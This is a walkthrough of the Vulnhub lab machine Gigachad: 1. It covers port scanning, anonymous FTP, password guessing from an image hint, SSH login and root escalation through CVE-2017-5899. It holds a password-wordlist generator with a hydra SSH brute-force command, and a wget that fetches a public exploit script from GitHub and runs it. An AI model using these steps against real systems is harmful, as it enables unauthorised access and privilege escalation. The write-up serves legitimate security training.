Gigachad : 1 Vulnhub Walkthrough

nikit.penkar
4 min read, Mar 16, 2021

This is a writeup for the Vulnhub machine Gigachad: 1, which was released by tasiyanci.

Level : Beginner / Intermediate

Goal: Find user flag and root flag

Machine Discovery:

First we use nmap -sn 192.168.1.0/24 (a ping sweep, no port scan) to find the machine on the network. My lab network is 192.168.1.0/24, so the target received an address in that range.

Port Scanning:

Once the machine is discovered (here at 192.168.1.5), we run a full TCP port scan with version detection and default scripts:

nmap -A -T4 -p- 192.168.1.5

Exploiting User Flag:

We discovered three open ports: FTP (21), SSH (22) and HTTP (80).

We can start with port 80, but the website has nothing of interest.

The scan output shows that the FTP server allows anonymous login, so we try that next.

ftp 192.168.1.5

The username is anonymous and the password is blank (press Enter at the password prompt).

We use the dir or ls command to list the files. As you can see, there is a file called chadinfo.

We download the file with the get command:

get chadinfo

Now let's view the file with cat:

cat chadinfo

The file gives us the username chad and, as a hint for the password, the path /drippinchad.png on the web server. Let's check it out.

Opening http://192.168.1.5/drippinchad.png in a browser shows the image below:

According to the caption, the password must be related to the place in the picture. If you recognise the place, skip the steps below. If not, download the image and do a reverse image lookup on Google.

Go to Google Images and click the camera icon.

Browse to the downloaded image and upload it.

You will see several links that identify the place.

I followed the second link and found that the name is Maiden's Tower.

Port 22 (SSH) is open, so we will log in as chad (the username from the chadinfo file) and guess a password related to Maiden's Tower.

After guessing for some time, I found that the password is maidenstower.

So we log in to SSH with username chad and password maidenstower:
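Guessing by hand worked here, but the usual way to turn a hint like "Maiden's Tower" into an SSH login attempt is to generate the common variations of the phrase (case, separators, possessive with or without the apostrophe, a few padding suffixes) and feed them to a brute-force tool. The script below is an added example and is not part of the original walkthrough; the suffix list and separator set are my assumptions about what people commonly append, not anything the box reveals. It produces "maidenstower" as its very first candidate.

```python
"""Build an SSH password wordlist from a place-name hint.

Added example (not from the walkthrough). Given a seed phrase such as
"Maiden's Tower" it emits the variations a person typically derives
from it, so the guessing step can be handed to hydra or a similar tool.
"""
import re
import sys

# Padding people commonly add to a dictionary word. Assumption for this
# example; tune it to the target's context (year of the box, "!", etc.).
SUFFIXES = ("", "1", "123", "!", "2021")
SEPARATORS = ("", "_", "-", ".")


def seed_phrases(phrase: str) -> list[str]:
    """Return the phrase with and without a possessive 's, apostrophes removed.

    "Maiden's Tower" -> ["Maidens Tower", "Maiden Tower"]
    """
    plain = phrase.replace("\u2019", "'")           # normalise curly apostrophe
    variants = [plain, re.sub(r"'s\b", "", plain)]  # keep and drop the possessive
    out: list[str] = []
    for v in variants:
        v = v.replace("'", "")
        if v not in out:
            out.append(v)
    return out


def base_forms(phrase: str) -> list[str]:
    """Join the words of each seed phrase with every casing and separator."""
    forms: list[str] = []
    for seed in seed_phrases(phrase):
        words = re.findall(r"[A-Za-z0-9]+", seed)
        if not words:
            continue
        casings = (
            [w.lower() for w in words],                              # maidenstower
            [w.capitalize() for w in words],                         # MaidensTower
            [w.upper() for w in words],                              # MAIDENSTOWER
            [words[0].lower()] + [w.capitalize() for w in words[1:]],  # maidensTower
        )
        for parts in casings:
            for sep in SEPARATORS:
                form = sep.join(parts)
                if form not in forms:
                    forms.append(form)
    return forms


def candidates(phrase: str, suffixes=SUFFIXES) -> list[str]:
    """Return an ordered, de-duplicated list of password candidates."""
    out: list[str] = []
    for form in base_forms(phrase):
        for suf in suffixes:
            word = form + suf
            if word not in out:
                out.append(word)
    return out


def write_wordlist(phrase: str, path: str) -> int:
    """Write one candidate per line; return how many were written."""
    words = candidates(phrase)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(words) + "\n")
    return len(words)


if __name__ == "__main__":
    hint = sys.argv[1] if len(sys.argv) > 1 else "Maiden's Tower"
    for w in candidates(hint):
        print(w)
```

Run it as python3 wordlist.py "Maiden's Tower" > candidates.txt and then hydra -l chad -P candidates.txt ssh://192.168.1.5 -t 4. Keep the thread count low against SSH: sshd rate-limits connections, and on a real engagement (as opposed to this lab box) account lockout and alerting are the concern, so a short, well-targeted list beats a large generic one.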

ssh chad@192.168.1.5

Running ls in chad's home directory shows the user flag, user.txt:

cat user.txt

Exploiting Root Flag:

To escalate privileges, we start by enumerating SUID binaries, since a vulnerable or misconfigured setuid executable is a common escalation path. The -perm -4000 test matches files with the SUID bit set:

find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;

Among the results is s-nail-privsep, the setuid helper that ships with the s-nail mail client. Researching it turns up CVE-2017-5899, a local privilege escalation in that helper for which a public exploit exists.

I used the exploit script from bcoles' local-exploits repository on GitHub.

From chad's home directory, download exploit.sh with wget. Read the script before running it: it is fetched from the internet and will execute on the target.
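On a stock Linux install the find command above returns a dozen or more expected SUID binaries (passwd, sudo, mount and friends), and the interesting one is whatever is not in that set. The script below is an added example, not part of the original walkthrough: it parses saved ls -la output from the find command and reports root-owned SUID files whose basename is not in a baseline of common SUID programs. The baseline is a triage aid I assembled for this example, not an authoritative whitelist, and the sample output embedded in it is constructed, including the path for s-nail-privsep.

```python
"""Triage `find / -perm -4000 -type f -exec ls -la {} \\;` output.

Added example (not from the walkthrough). Reads ls -la lines, keeps the
root-owned files that actually carry the SUID bit, and prints those whose
basename is not a commonly shipped SUID program, so odd helpers such as
s-nail-privsep stand out.
"""
import sys
from pathlib import PurePosixPath

# Basenames of SUID binaries found on most Linux distributions.
# Assumption for triage only; anything here still deserves a version check.
BASELINE = {
    "passwd", "sudo", "su", "mount", "umount", "chsh", "chfn", "gpasswd",
    "newgrp", "chage", "expiry", "fusermount", "fusermount3", "pkexec",
    "ping", "ping6", "ssh-keysign", "dbus-daemon-launch-helper",
    "polkit-agent-helper-1", "at", "crontab", "Xorg",
}

# Constructed sample of what the find command prints; sizes, dates and the
# s-nail-privsep path are illustrative, not captured from the real box.
SAMPLE_OUTPUT = """\
-rwsr-xr-x 1 root root 63568 Jan 10  2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 44528 Jan 10  2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 149080 Jan 31  2020 /usr/bin/sudo
-rwsr-xr-x 1 root root 43088 Sep 16  2020 /usr/bin/mount
-rwsr-xr-x 1 root root 14488 Feb  4  2021 /usr/local/libexec/s-nail-privsep
-rwsr-xr-x 1 chad chad 8456 Mar 10  2021 /home/chad/backup
-rwxr-xr-x 1 root root 1234 Mar 10 12:34 /usr/bin/not-suid
"""


def parse_ls_lines(text: str):
    """Yield (mode, owner, path) from ls -la lines, skipping malformed ones.

    Splitting on at most 8 whitespace runs keeps paths with spaces intact:
    mode, links, owner, group, size, month, day, year-or-time, path.
    """
    for line in text.splitlines():
        parts = line.split(None, 8)
        if len(parts) < 9 or len(parts[0]) != 10:
            continue
        yield parts[0], parts[2], parts[8]


def is_suid(mode: str) -> bool:
    """True when the user-execute slot shows 's' (SUID+exec) or 'S' (SUID only)."""
    return mode[3].lower() == "s"


def unusual_suid(text: str, baseline=BASELINE) -> list[str]:
    """Return root-owned SUID paths whose basename is not in the baseline."""
    hits = []
    for mode, owner, path in parse_ls_lines(text):
        if not is_suid(mode) or owner != "root":
            continue
        if PurePosixPath(path).name not in baseline:
            hits.append(path)
    return hits


if __name__ == "__main__":
    # Usage: python3 suid_triage.py suid.txt   (or pipe the find output in)
    data = open(sys.argv[1]).read() if len(sys.argv) > 1 else sys.stdin.read()
    for p in unusual_suid(data or SAMPLE_OUTPUT):
        print(p)
```

On the target, redirect the find output to a file (find / -perm -4000 -type f -exec ls -la {} \; 2>/dev/null > suid.txt), copy it back and run the script over it. The filter is deliberately conservative: it only hides names, so a baseline program at a vulnerable version is still worth a searchsploit or version lookup, and a non-root SUID file (skipped here) can matter for lateral movement.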

wget https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2017-5899/exploit.sh

Now we make exploit.sh executable with chmod. Execute permission is all the script needs; chmod 777 is often used here but is unnecessary and also makes the file world-writable.

chmod +x exploit.sh

Then we run the exploit:

./exploit.sh

The script prints a success message and drops us into a root shell.

Change to the /root directory to find the last flag, root.txt:

cat root.txt

Thanks for reading! :)

Please let me know if you have any queries or suggestions.